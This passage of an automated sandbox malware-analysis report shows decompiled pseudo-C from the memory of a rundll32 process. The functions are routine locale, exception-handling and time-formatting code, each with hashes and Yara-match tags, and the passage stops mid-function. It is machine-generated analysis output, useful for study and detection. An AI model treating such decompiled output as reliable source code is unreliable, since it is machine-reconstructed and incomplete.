                				 *(_t314 + 0x38) = r14d;
                				asm("lock xadd [edi+0x34], eax");
                				if (r14d != 0) goto 0x20594586;
                				goto 0x20594130;
                				_t323[4] = _t314;
                				r9d = _t323[0x22];
                				 *((intOrPtr*)(_t263 + 0x28))();
                				_t230 =  *(__r8 + 0x50);
                				if ( *(__r8 + 0x50) <= 0) goto 0x205944e5;
                				 *(__r8 + 0x50) = 0;
                				E00000215215205D1628( &(_t323[0xa]), __r8 + 0x58);
                				E00000215215205D1628(_t323 - 0x50,  &(_t323[0xa]));
                				_t252 = _t323 - 0x50;
                				 *((long long*)(_t326 + 0x58)) = _t252;
                				E00000215215205D1770(_t184, _t191,  *(_t326 + 0x40) *  *(_t326 + 0x48) >> 0x20, _t230, _t252, _t263, _t323 - 0x50,  &(_t323[0xa]), _t314, _t250, _t326 + 0x60);
                				 *((long long*)(_t323 - 0x40)) = _t252;
                				 *((long long*)(_t323 - 0x38)) = _t252;
                				 *((long long*)(_t323 - 0x30)) = _t252;
                				asm("movups xmm0, [ebp-0x40]");
                				asm("inc ecx");
                				asm("movsd xmm1, [ebp-0x30]");
                				asm("repne inc ecx");
                				asm("lock xadd [edi+0x30], ecx");
                				if ((_t191 | 0xffffffff) != 1) goto 0x2059451d;
                				E0000021521520593DF0(_t252, _t263, _t314,  &(_t323[0xa]));
                				_t253 = _t346;
                				goto 0x2059462b;
                				E000002152152058F380(_t314,  &(_t323[0xa]));
                				_t264 = _t253;
                				 *(_t323 - 0x80) = _t253;
                				 *(_t323 - 0x78) = _t253;
                				if ( *((intOrPtr*)(_t264 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059455d;
                				 *((intOrPtr*)( *_t264 + 0x30))();
                				goto 0x20594563;
                				 *((long long*)(_t323 - 0x70)) = 0x4d54ee85da812032;
                				 *(_t323 - 0x80) = r14d;
                				 *(_t323 - 0x78) = _t264;
                				asm("movups xmm0, [ebp-0x80]");
                				asm("movsd xmm1, [ebp-0x70]");
                				goto 0x2059461f;
                				_t115 = _t314 + 0x38;
                				r15d =  *_t115;
                				 *_t115 = r15d;
                				if (r15d != 0) goto 0x20594608;
                				r9d = 0;
                				r8d = 0;
                				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0x20594608;
                				_t176 = GetLastError();
                				E000002152152058F380( *((intOrPtr*)(_t314 + 0x28)),  &(_t323[0xa]));
                				 *(_t323 - 0x68) = 0x4d54ee85da812032;
                				 *((long long*)(_t323 - 0x60)) = 0x4d54ee85da812032;
                				if ( *0x4D54EE85DA81203A + 0xda812030 - 1 <= 0) goto 0x205945e4;
                				 *((intOrPtr*)( *((intOrPtr*)(0x4d54ee85da812032)) + 0x30))();
                				goto 0x205945e9;
                				 *((long long*)(_t323 - 0x58)) = 0xda812030;
                				 *(_t323 - 0x68) = _t176;
                				 *((long long*)(_t323 - 0x60)) = 0x4d54ee85da812032;
                				asm("movups xmm0, [ebp-0x68]");
                				asm("movsd xmm1, [ebp-0x58]");
                				goto 0x2059461f;
                				 *((long long*)(_t323 - 0x28)) = 0xda812030;
                				 *((long long*)(_t323 - 0x20)) = 0x4d54ee85da812032;
                				 *(_t323 - 0x18) = _t344;
                				asm("movups xmm0, [ebp-0x28]");
                				asm("movsd xmm1, [ebp-0x18]");
                				asm("inc ecx");
                				asm("repne inc ecx");
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$ErrorLast$CompletionCopyCriticalQueuedSectionStatus$EnterLeavePostPtr::_Ptr_baseRethrowTimerWaitable
                • String ID:
                • API String ID: 2067398983-0
                • Opcode ID: 5759055dd755c935cddb1a82f18bdde7b458cca11cde4f6942d2d2c6e03ee8bf
                • Instruction ID: e65f2a5b72853cd3a6c5e947952f534263476ef140f605a0e34ea0cf89833d34
                • Opcode Fuzzy Hash: 5759055dd755c935cddb1a82f18bdde7b458cca11cde4f6942d2d2c6e03ee8bf
                • Instruction Fuzzy Hash: 4FF17873702BA4CBEB648F25E8847AE73A4FB98784F144125DE4A97B58DF38C495CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215206120E8(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
                				signed int _v72;
                				int _v80;
                				int _v84;
                				signed int _v88;
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				int _t61;
                				intOrPtr _t62;
                				void* _t74;
                				intOrPtr _t84;
                				intOrPtr _t86;
                				void* _t92;
                				signed long long _t119;
                				signed long long _t120;
                				intOrPtr* _t121;
                				intOrPtr* _t122;
                				intOrPtr* _t123;
                				intOrPtr* _t124;
                				intOrPtr* _t125;
                				signed long long _t127;
                				void* _t128;
                				intOrPtr* _t129;
                				signed long long _t137;
                				signed long long _t139;
                				void* _t150;
                				signed long long _t151;
                				void* _t153;
                				void* _t161;
                				long long _t162;
                				intOrPtr* _t164;
                
                				_t161 = __r9;
                				_t144 = __rdx;
                				_t130 = __rcx;
                				_t74 = __ecx;
                				_t119 =  *0x2067c720; // 0xca1645d940e
                				_t120 = _t119 ^ _t153 - 0x00000040;
                				_v72 = _t120;
                				_t150 = __r8;
                				_t164 = __rdx;
                				_t162 = __rcx;
                				E000002152152060C334(_t120, _t128, __rcx, __rdx, __r9);
                				_t151 = _t120;
                				_v88 = _t120;
                				_v80 = 0;
                				E000002152152060C334(_t120, _t128, _t130, __rdx, __r9);
                				r12d = 0;
                				_t5 = _t151 + 0xa0; // 0xa0
                				_t129 = _t5;
                				 *((long long*)(_t120 + 0x3a0)) =  &_v88;
                				_t121 = _t162 + 0x80;
                				 *((long long*)(_t151 + 0x98)) = _t162;
                				 *_t129 = _t121;
                				if (_t121 == 0) goto 0x2061216f;
                				if ( *_t121 == r12w) goto 0x2061216f;
                				_t84 =  *0x20635120; // 0x17
                				E000002152152061205C(_t84 - 1, _t129, 0x20634fb0, __r8, _t151, _t153, _t129);
                				_v88 = r12d;
                				_t122 =  *((intOrPtr*)(_t151 + 0x98));
                				if (_t122 == 0) goto 0x206121f8;
                				if ( *_t122 == r12w) goto 0x206121f8;
                				_t123 =  *_t129;
                				if (_t123 == 0) goto 0x2061219e;
                				if ( *_t123 == r12w) goto 0x2061219e;
                				E0000021521520611A08(_t74, _t84 - 1, _t123, _t129,  &_v88, _t144, _t129, __r9);
                				goto 0x206121a7;
                				E0000021521520611AD8(_t74, _t84 - 1, _t123, _t129,  &_v88, _t144, _t129);
                				if (_v88 != r12d) goto 0x2061226e;
                				_t86 =  *0x20634fa0; // 0x41
                				_t14 = _t151 + 0x98; // 0x98
                				if (E000002152152061205C(_t86 - 1, _t129, 0x20634b90, __r8, _t151, _t153, _t14) == 0) goto 0x20612264;
                				_t124 =  *_t129;
                				if (_t124 == 0) goto 0x206121ed;
                				if ( *_t124 == r12w) goto 0x206121ed;
                				E0000021521520611A08(_t74, _t86 - 1, _t124, _t129,  &_v88, _t144, _t14, __r9);
                				goto 0x20612264;
                				_t137 =  &_v88;
                				E0000021521520611AD8(_t74, _t86 - 1, _t124, _t129, _t137, _t144, _t14);
                				goto 0x20612264;
                				_t125 =  *_t129;
                				if (_t125 == 0) goto 0x20612251;
                				if ( *_t125 == r12w) goto 0x20612251;
                				E000002152152060C334(_t125, _t129, _t137, _t144, __r9);
                				_t139 = (_t137 | 0xffffffff) + 1;
                				if ( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xa0)) + _t139 * 2)) != r12w) goto 0x20612219;
                				 *(_t125 + 0xb4) = r12d & 0xffffff00 | _t139 == 0x00000003;
                				EnumSystemLocalesW(??, ??);
                				if ((_v88 & 0x00000004) != 0) goto 0x20612264;
                				_v88 = r12d;
                				goto 0x20612264;
                				_v88 = 0x104;
                				_t61 = GetUserDefaultLCID();
                				_v80 = _t61;
                				_v84 = _t61;
                				if (_v88 == r12d) goto 0x20612358;
                				_t127 = _t162 + 0x100;
                				asm("dec eax");
                				_t62 = E0000021521520611F00(_t129, 0x2152061191c & _t127,  &_v88, _t151);
                				if (_t62 == 0) goto 0x20612358;
                				_t34 = _t127 - 0xfde8; // -65000
                				if (_t34 - 1 <= 0) goto 0x20612358;
                				if (IsValidCodePage(??) == 0) goto 0x20612358;
                				if (IsValidLocale(??, ??) == 0) goto 0x20612358;
                				if (_t164 == 0) goto 0x206122cf;
                				 *_t164 = _t62;
                				_t37 = _t151 + 0x2f0; // 0x2f0
                				r9d = 0;
                				_t38 = _t161 + 0x55; // 0x55
                				_t92 = _t38;
                				r8d = _t92;
                				E000002152152060CE80(_v84, _t164, _t129, 0x2152061191c & _t127, _t37, _t150, _t151, _t153);
                				if (_t150 == 0) goto 0x20612351;
                				r9d = 0;
                				r8d = _t92;
                				E000002152152060CE80(_v84, _t150, _t129, 0x2152061191c & _t127, _t150 + 0x120, _t150, _t151, _t153);
                				r9d = 0x40;
                				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20612358;
                				r9d = 0x40;
                				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20612358;
                				_t45 = _t151 - 0x36; // 0xa
                				r9d = _t45;
                				_t46 = _t151 - 0x30; // 0x10
                				r8d = _t46;
                				E0000021521520616E28(_t62);
                				goto 0x2061235a;
                				return E00000215215205F59D0(_t62, _v72 ^ _t153 - 0x00000040, _t150 + 0x100, _t161);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastLocale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUserabort
                • String ID:
                • API String ID: 3941709727-0
                • Opcode ID: d7299cf76eedf279815c05bbd91bebbd38343e6a9d947d762e7082f754918e1b
                • Instruction ID: 4323258230d7d594ec8703db8d740964a6fdf50979f6c140ca66b6d5c422c627
                • Opcode Fuzzy Hash: d7299cf76eedf279815c05bbd91bebbd38343e6a9d947d762e7082f754918e1b
                • Instruction Fuzzy Hash: 9871AA33702B61CAFF34DB60D8497ECA3A1BFA4B44F6441A58E1957788EB38E955CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00007FFA7FFA535E59AC(intOrPtr* __rax, void* __rcx, void* __rdx) {
                				void* _t3;
                				void* _t4;
                
                				if (__rcx != 0) goto 0x535e59dd;
                				_t3 = E00007FFA7FFA535E8380(__rax);
                				 *__rax =  *__rax - _t3;
                				 *0x8DE81888C48348D9 =  *((intOrPtr*)(0x8de81888c48348d9)) + _t4;
                				return _t3;
                			}






                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1405656091-0
                • Opcode ID: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction ID: 6a254501618ceb464c2463a5cf7c6ddc1d39466bc1bcfdd50d903b4257d67876
                • Opcode Fuzzy Hash: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction Fuzzy Hash: 6A81D8B2B14B464FEB589F34C9513B923AAEF85788F08E475DA0D9A785EF3CE4009700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00000215215206116FC(void* __ecx, void* __edx, long long __rbx, intOrPtr __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9) {
                				intOrPtr _t36;
                				void* _t48;
                				void* _t81;
                				intOrPtr* _t82;
                				intOrPtr* _t85;
                				intOrPtr* _t87;
                				intOrPtr* _t105;
                				intOrPtr* _t109;
                				long long _t112;
                				void* _t113;
                				void* _t115;
                				signed long long _t127;
                				void* _t128;
                				void* _t129;
                				void* _t131;
                				intOrPtr _t132;
                				int _t134;
                				intOrPtr* _t135;
                
                				_t48 = __ecx;
                				_t81 = _t115;
                				 *((long long*)(_t81 + 8)) = __rbx;
                				 *((long long*)(_t81 + 0x10)) = _t112;
                				 *((long long*)(_t81 + 0x18)) = __rsi;
                				 *((long long*)(_t81 + 0x20)) = __rdi;
                				_t113 = __r8;
                				_t109 = __rdx;
                				_t132 = __rcx;
                				E000002152152060C334(_t81, __rbx, __rcx, __rdx, __r9);
                				r12d = 0;
                				_t5 = _t81 + 0x98; // 0x98
                				_t87 = _t5;
                				_t82 = _t132 + 0x80;
                				 *((intOrPtr*)(_t87 + 0x10)) = r12d;
                				_t8 = _t87 + 0x258; // 0x2f0
                				_t135 = _t8;
                				 *_t87 = _t132;
                				_t9 = _t87 + 8; // 0xa0
                				_t105 = _t9;
                				 *_t135 = r12w;
                				 *_t105 = _t82;
                				if ( *_t82 == r12w) goto 0x2061176b;
                				_t10 = _t129 + 0x16; // 0x16
                				E0000021521520611660(_t10, _t87, 0x20634fb0, _t105, __rdx, _t105);
                				if ( *((intOrPtr*)( *_t87)) == r12w) goto 0x206117c4;
                				if ( *((intOrPtr*)( *_t105)) == r12w) goto 0x20611787;
                				E0000021521520610F38(_t87, _t87, _t105, __r9);
                				goto 0x2061178c;
                				E0000021521520611008(_t87, _t87, _t105, __r9);
                				if ( *((intOrPtr*)(_t87 + 0x10)) != r12d) goto 0x206117d3;
                				if (E0000021521520611660(0x40, _t87, 0x20634b90, _t105, _t109, _t87) == 0) goto 0x206117c9;
                				_t85 =  *_t105;
                				if ( *_t85 == r12w) goto 0x206117bd;
                				E0000021521520610F38(_t87, _t87, _t87, __r9);
                				goto 0x206117c9;
                				E0000021521520611008(_t87, _t87, _t87, __r9);
                				goto 0x206117c9;
                				E0000021521520610E90(_t48,  *_t85 - r12w, _t87, _t87, _t109, _t87, __r9);
                				if ( *((intOrPtr*)(_t87 + 0x10)) == r12d) goto 0x206118e3;
                				_t36 = E0000021521520611544(_t87, _t132 + 0x100, _t87, _t109, __r9);
                				if (_t36 == 0) goto 0x206118e3;
                				_t14 = _t85 - 0xfde8; // -65000
                				if (_t14 - 1 <= 0) goto 0x206118e3;
                				if (IsValidCodePage(_t134) == 0) goto 0x206118e3;
                				if (_t109 == 0) goto 0x20611813;
                				 *_t109 = _t36;
                				if (_t113 == 0) goto 0x206118dc;
                				_t110 = _t113 + 0x120;
                				 *((intOrPtr*)(_t113 + 0x120)) = r12w;
                				_t127 = (__r9 | 0xffffffff) + 1;
                				if ( *((intOrPtr*)(_t135 + _t127 * 2)) != r12w) goto 0x2061182b;
                				_t128 = _t127 + 1;
                				if (E000002152152060FCBC(0x55, _t85, _t87, _t113 + 0x120, _t87, _t128) != 0) goto 0x20611904;
                				_t18 = _t85 + 0x40; // 0x40
                				r9d = _t18;
                				if (E000002152152060CB80(0x1001, E000002152152060FCBC(0x55, _t85, _t87, _t113 + 0x120, _t87, _t128), _t87, _t113 + 0x120, _t105, _t113 + 0x120, _t113, _t113, _t131, _t129) == 0) goto 0x206118e3;
                				_t106 = _t113 + 0x80;
                				r9d = 0x40;
                				if (E000002152152060CB80(0x1002, E000002152152060CB80(0x1001, E000002152152060FCBC(0x55, _t85, _t87, _t113 + 0x120, _t87, _t128), _t87, _t113 + 0x120, _t105, _t113 + 0x120, _t113, _t113, _t131, _t129), _t87, _t110, _t113 + 0x80, _t110, _t113, _t113 + 0x80) == 0) goto 0x206118e3;
                				E0000021521520619EA0(0x5f, _t113 + 0x80, _t128);
                				if (_t85 != 0) goto 0x206118ab;
                				_t20 = _t85 + 0x2e; // 0x2e
                				E0000021521520619EA0(_t20, _t113 + 0x80, _t128);
                				if (_t85 == 0) goto 0x206118c4;
                				r9d = 0x40;
                				_t21 = _t128 - 0x39; // 0x7
                				if (E000002152152060CB80(_t21, _t85, _t87, _t110, _t106, _t110, _t113, _t106) == 0) goto 0x206118e3;
                				r9d = 0xa;
                				_t23 = _t128 + 6; // 0x46
                				r8d = _t23;
                				E0000021521520616E28(_t36);
                				goto 0x206118e5;
                				return 0;
                			}






















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastNameTranslatewcschr$CodePageValidabort
                • String ID:
                • API String ID: 4237316620-0
                • Opcode ID: 6e0d7540de0bad719d2ec0437c96c5c6e4f161892cdc235a74008e37cab5573f
                • Instruction ID: a4fc89dab48fb37aa6f1cda6a31bda1e72f12aebb0f297036f53acc37e0fa5fe
                • Opcode Fuzzy Hash: 6e0d7540de0bad719d2ec0437c96c5c6e4f161892cdc235a74008e37cab5573f
                • Instruction Fuzzy Hash: 2D81BE37202B60C6EF70AF62D4193E9A3A5FFE4B80F6481619E494B7C9DB78E945C300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00007FFA7FFA535E8054(void* __ecx, void* __edx, void* __esp, long long __rbx, long long __rdx, long long __rsi, void* __r8) {
                				void* __rdi;
                				void* _t36;
                				long _t42;
                				void* _t43;
                				signed long long _t54;
                				long long _t57;
                				long long _t61;
                				void* _t65;
                				_Unknown_base(*)()* _t84;
                				void* _t90;
                				void* _t91;
                				void* _t93;
                				signed long long _t94;
                				struct _EXCEPTION_POINTERS* _t100;
                
                				_t44 = __ecx;
                				 *((long long*)(_t93 + 0x10)) = __rbx;
                				 *((long long*)(_t93 + 0x18)) = __rsi;
                				_t3 = _t93 - 0x4f0; // -1288
                				_t91 = _t3;
                				_t94 = _t93 - 0x5f0;
                				_t54 =  *0x53754140; // 0x3c63485c5c92
                				 *(_t91 + 0x4e0) = _t54 ^ _t94;
                				if (_t65 == 0xffffffff) goto 0x535e8093;
                				E00007FFA7FFA535E3724(_t36);
                				_t5 = _t94 + 0x70; // 0x58
                				r8d = 0x98;
                				E00007FFA7FFA535E3F50(__ecx, __edx, r8d, __esp, _t5, 0, _t84, __r8);
                				_t6 = _t91 + 0x10; // -1272
                				r8d = 0x4d0;
                				E00007FFA7FFA535E3F50(_t44, __edx, r8d, __esp, _t6, 0, _t84, __r8);
                				_t7 = _t94 + 0x70; // 0x58
                				 *((long long*)(_t94 + 0x48)) = _t7;
                				_t10 = _t91 + 0x10; // -1272
                				_t57 = _t10;
                				 *((long long*)(_t94 + 0x50)) = _t57;
                				__imp__RtlCaptureContext();
                				r8d = 0;
                				__imp__RtlLookupFunctionEntry();
                				if (_t57 == 0) goto 0x535e8126;
                				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                				_t16 = _t94 + 0x60; // 0x48
                				 *((long long*)(_t94 + 0x30)) = _t16;
                				_t19 = _t94 + 0x58; // 0x40
                				 *((long long*)(_t94 + 0x28)) = _t19;
                				_t21 = _t91 + 0x10; // -1272
                				 *((long long*)(_t94 + 0x20)) = _t21;
                				__imp__RtlVirtualUnwind();
                				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                				_t25 = _t91 + 0x508; // 0x0
                				 *((long long*)(_t94 + 0x70)) = __rdx;
                				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
                				_t61 =  *((intOrPtr*)(_t91 + 0x508));
                				 *((long long*)(_t91 - 0x80)) = _t61;
                				 *(_t94 + 0x74) = _t84;
                				IsDebuggerPresent();
                				SetUnhandledExceptionFilter(_t84, _t90);
                				_t42 = UnhandledExceptionFilter(_t100);
                				if (_t61 != 0) goto 0x535e8188;
                				if (_t61 != 0) goto 0x535e8188;
                				if (_t65 == 0xffffffff) goto 0x535e8188;
                				_t43 = E00007FFA7FFA535E3724(_t42);
                				E00007FFA7FFA535F51E0();
                				return _t43;
                			}


















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                • String ID:
                • API String ID: 1239891234-0
                • Opcode ID: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction ID: f429eeaa50d87a529be4717e38f090dfb5aaf64696a15ceccdf1ef425ecd3830
                • Opcode Fuzzy Hash: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction Fuzzy Hash: D731B436628F818ADB20CF25E8402AE73A9FBC5794F485135EA8D53B98DF3CD145CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205FA8B0(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                				void* __rdi;
                				void* _t36;
                				int _t40;
                				void* _t45;
                				intOrPtr _t53;
                				signed long long _t63;
                				long long _t66;
                				_Unknown_base(*)()* _t86;
                				void* _t90;
                				void* _t91;
                				void* _t93;
                				signed long long _t94;
                				struct _EXCEPTION_POINTERS* _t100;
                
                				_t46 = __ecx;
                				 *((long long*)(_t93 + 0x10)) = __rbx;
                				 *((long long*)(_t93 + 0x18)) = __rsi;
                				_t91 = _t93 - 0x4f0;
                				_t94 = _t93 - 0x5f0;
                				_t63 =  *0x2067c720; // 0xca1645d940e
                				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                				_t53 = r8d;
                				_t45 = __ecx;
                				if (__ecx == 0xffffffff) goto 0x205fa8ef;
                				E00000215215205F5DD0(_t36);
                				r8d = 0x98;
                				E00000215215205F8EF0(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                				r8d = 0x4d0;
                				E00000215215205F8EF0(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                				_t66 = _t91 + 0x10;
                				 *((long long*)(_t94 + 0x50)) = _t66;
                				__imp__RtlCaptureContext();
                				r8d = 0;
                				__imp__RtlLookupFunctionEntry();
                				if (_t66 == 0) goto 0x205fa982;
                				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                				 *((long long*)(_t94 + 0x30)) = _t94 + 0x60;
                				 *((long long*)(_t94 + 0x28)) = _t94 + 0x58;
                				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                				__imp__RtlVirtualUnwind();
                				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                				_t40 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(_t86, _t90);
                				if (UnhandledExceptionFilter(_t100) != 0) goto 0x205fa9e4;
                				if (_t40 != 0) goto 0x205fa9e4;
                				if (_t45 == 0xffffffff) goto 0x205fa9e4;
                				E00000215215205F5DD0(_t42);
                				return E00000215215205F59D0(_t45,  *(_t91 + 0x4e0) ^ _t94,  *((intOrPtr*)(_t94 + 0x40)), _t66);
                			}

















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                • String ID:
                • API String ID: 1239891234-0
                • Opcode ID: bdd22a3e785216847e4525529e3db3b736ff015fa7bf852898a8c4624f47431c
                • Instruction ID: d9a76dc34f9e691342a4cd222803af01a0ae3ee318d92e35c8a0be3104f95239
                • Opcode Fuzzy Hash: bdd22a3e785216847e4525529e3db3b736ff015fa7bf852898a8c4624f47431c
                • Instruction Fuzzy Hash: F9315D33215F90C6DB609B25E8487EA77A4FBD9758F500126EE9D43BA9DF38C5458B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0000021521520604C78(void* __ecx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a24, long long _a32) {
                				void* _t9;
                				void* _t13;
                
                				_a8 = __rbx;
                				_a24 = __rbp;
                				_a32 = __rsi;
                				if (__rdx != 0) goto 0x20604cb2;
                				return E00000215215206025B8(__ecx, _t9, _t13, __rdx);
                			}






                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wcsftime$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 4239037671-0
                • Opcode ID: 6e4ef63b484ccce730011eb32c6a4c47bc475d85faa6a6323987f0634767b6b3
                • Instruction ID: a39b93622787b37d9b23cbe70425e17ecdbffd56ba661c164a4324559693e640
                • Opcode Fuzzy Hash: 6e4ef63b484ccce730011eb32c6a4c47bc475d85faa6a6323987f0634767b6b3
                • Instruction Fuzzy Hash: 2971E373256B60C3FB789B35A0493AB6292FFD5798F244665EE9947EDDCF38D0018600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E00007FFA7FFA535EDE00(void* __edx, long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                				long long _v72;
                				intOrPtr _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t33;
                				void* _t36;
                				void* _t43;
                				void* _t44;
                				signed long long _t65;
                				long long _t67;
                				long long _t68;
                				long long _t69;
                				long long _t76;
                				void* _t81;
                				void* _t88;
                				long long _t104;
                				void* _t110;
                				intOrPtr* _t112;
                				void* _t114;
                				void* _t117;
                				intOrPtr _t129;
                				void* _t131;
                				void* _t132;
                				signed long long _t133;
                				signed long long _t134;
                				signed long long _t137;
                				intOrPtr* _t138;
                
                				_t43 = __edx;
                				_a8 = __rbx;
                				_a16 = __rdx;
                				if (__rdx != 0) goto 0x535ede3c;
                				_t33 = E00007FFA7FFA535E8380(__rax);
                				 *__rax = 0x16;
                				E00007FFA7FFA535E8260(_t33);
                				goto 0x535edfdc;
                				asm("xorps xmm0, xmm0");
                				 *((long long*)(__rdx)) = 0;
                				asm("movdqu [ebp-0x20], xmm0");
                				_v72 = 0;
                				if ( *__rcx == 0) goto 0x535edea7;
                				_a24 = 0x3f2a;
                				_a26 = dil;
                				E00007FFA7FFA535F2864( *((intOrPtr*)(0x16)),  &_a24);
                				if (0x16 != 0) goto 0x535ede7e;
                				r8d = 0;
                				_t36 = E00007FFA7FFA535EE00C(0x16,  *((intOrPtr*)(0x16)), 0, 0, _t110, _t114, _t117,  &_v88);
                				goto 0x535ede8a;
                				0x535ee11c();
                				r14d = _t36;
                				if (0x16 != 0) goto 0x535ede9a;
                				goto 0x535ede4e;
                				goto 0x535edfa0;
                				_t112 = _v88;
                				_t129 = _v80;
                				_a24 = 0;
                				_t65 = _t129 - _t112;
                				_t137 = (_t65 >> 3) + 1;
                				_t88 =  >  ? 0 : _t65 + 7 >> 3;
                				_t134 = _t133 | 0xffffffff;
                				if (_t88 == 0) goto 0x535edf09;
                				_t67 = _t134 + 1;
                				if ( *((intOrPtr*)( *_t112 + _t67)) != dil) goto 0x535edeea;
                				if (1 != _t88) goto 0x535edee4;
                				_a24 = 1 + _t67;
                				r8d = 1;
                				E00007FFA7FFA535E72EC(_t137, 1 + _t67, 1);
                				_t76 = _t67;
                				if (_t67 == 0) goto 0x535edf99;
                				_t104 = _t67 + _t137 * 8;
                				_t138 = _t112;
